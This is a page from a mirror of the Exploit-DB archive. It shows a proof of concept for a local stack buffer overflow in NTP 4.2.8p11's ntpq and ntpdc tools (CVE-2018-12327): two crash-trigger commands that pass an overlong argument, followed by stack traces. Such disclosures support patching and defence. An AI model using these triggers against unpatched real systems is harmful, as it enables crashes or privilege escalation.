bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/dos/44909.txt
Offensive Security ac267cb298 DB: 2018-06-21 
11 changes to exploits/shellcodes

Redis 5.0 - Denial of Service
ntp 4.2.8p11 - Local Buffer Overflow (PoC)
Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation
Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Mirasys DVMS Workstation 5.12.6 - Path Traversal
MaDDash 2.0.2 - Directory Listing
NewMark CMS 2.1 - 'sec_id' SQL Injection
TP-Link TL-WA850RE - Remote Command Execution
Apache CouchDB < 2.1.0 - Remote Code Execution
IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)
VideoInsight WebClient 5 - SQL Injection
2018-06-21 05:01:44 +00:00

26 lines
No EOL
1.4 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: ntpq and ntpdc 4.2.8p11 Local Buffer Overflow
# Date: 2018-06-06
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: http://www.ntp.org/
# Software Link: http://www.ntp.org/downloads.html
# Version: 4.2.8p11 and earlier
# Tested on: 4.2.8p11
# CVE : CVE-2018-12327
Stack-based buffer overflow in ntpq and ntpdc of NTP version 4.2.8p11 allows a local attacker to achieve code execution or escalate to higher privileges via a long string as the argument for an IPv4 or IPv6 command-line parameter.
$ ./ntpq -4 [`python -c 'print "A" * 300`]
#0 0x562fcada86ce in openhost /home/user/ntp-4.2.8p11/ntpq/ntpq.c:655:12
#1 0x562fcada5f2a in ntpqmain /home/user/ntp-4.2.8p11/ntpq/ntpq.c:606:10
#2 0x562fcada4729 in main /home/user/ntp-4.2.8p11/ntpq/ntpq.c:469:9
#3 0x7f79b684982f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#4 0x562fcac96d88 in _start (/home/user/ntp-4.2.8p11/ntpq/ntpq+0xacd88)
$ ./ntpdc -4 [`python -c 'print "A" * 300'`]
#0 0x55f726641efe in openhost /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:413:12
#1 0x55f7266400d4 in ntpdcmain /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:365:10
#2 0x55f72663f269 in main /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:255:9
#3 0x7f0fc632382f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#4 0x55f7265362d8 in _start (/home/user/ntp-4.2.8p11/ntpdc/ntpdc+0x9d2d8)
Reference in a new issue View git blame Copy permalink